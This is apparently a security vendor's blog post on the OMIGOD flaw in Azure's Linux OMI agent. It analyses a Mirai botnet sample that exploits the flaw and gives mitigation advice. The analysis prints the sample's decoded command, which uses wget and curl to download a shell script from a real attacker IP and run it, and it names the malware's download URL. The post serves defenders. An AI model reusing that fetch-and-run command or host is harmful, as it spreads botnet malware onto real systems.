Azure users running Linux virtual machines are at risk of compromise unless they upgrade now. A vulnerable piece of management software in the Open Management Infrastructure (OMI) framework can be remotely exploited by attackers enabling them to escalate to root privileges and remotely execute malicious code.
Azure will automatically install the OMI agent when users set up a Linux VM and monitoring and other services are enabled. By default, OMI runs with root access – making the system extremely vulnerable and subject to compromise. It typically runs on ports 5986, 5985, and 1270; however, any port can be used.
Incredibly, OMIGOD, discovered by researchers at Wiz, is exploited by simply skipping the authentication of requests, which defaults with root access across systems.
Below our team has performed an analysis of a real-world attack we’ve observed that exploits OMIGOD.
Mirai Botnet – Quick off the Mark
There is always a race among botnets to see who can compromise hosts first. Greynoise has reported on a number of systems that are either scanning for, or actively exploiting, OMIGOD.
One botnet operator is definitely attempting it though, and credit to Germán Fernández for picking this one up:
Below we have analysed an x86 Mirai sample from http://212.192.241[.]72/bins/dark.x86
The worm tries to spread to other systems through a number of vulnerabilities, including OMIGOD.
We can see the exploit code for OMIGOD after decompiling the sample with Retdec:
The parameter <p:command> contains the following command, encoded with base64:
wget http://212.192.241[.]72/lolol.sh; curl -O http://212.192.241[.]72/lolol.sh; chmod 777 lolol.sh; sh lolol.sh
Which is subsequently used to install the Mirai botnet via the URL:
The file lolol.sh is a fairly standard Mirai installer that:
- Attempts to install across multiple possible Architectures
- Hides itself as the legitimate web server “nginx”
- Then closes the ports of the vulnerabilities it exploited to stop other botnets taking over the system:
Ensure Microsoft Azure Firewall is set to block any access to OMI ports.
You can check that the OMI agent is not present on your Linux systems:
[email protected]:~$ sudo dpkg -l omi
dpkg-query: no packages found matching omi
If it is, ensure it is running the latest version. Microsoft is not automatically updating insecure agents, and even systems deployed after the publication of the vulnerability may be vulnerable. They have provided guidance to customers in a post titled “Open Management Infrastructure Remote Code Execution Vulnerability”.
If you’d like to investigate potentially compromised machines, the full unlimited version of the Cado Response platform is now available for Azure via a free trial. The Cado Response platform does not run the OMI agent.
Indicators of Compromise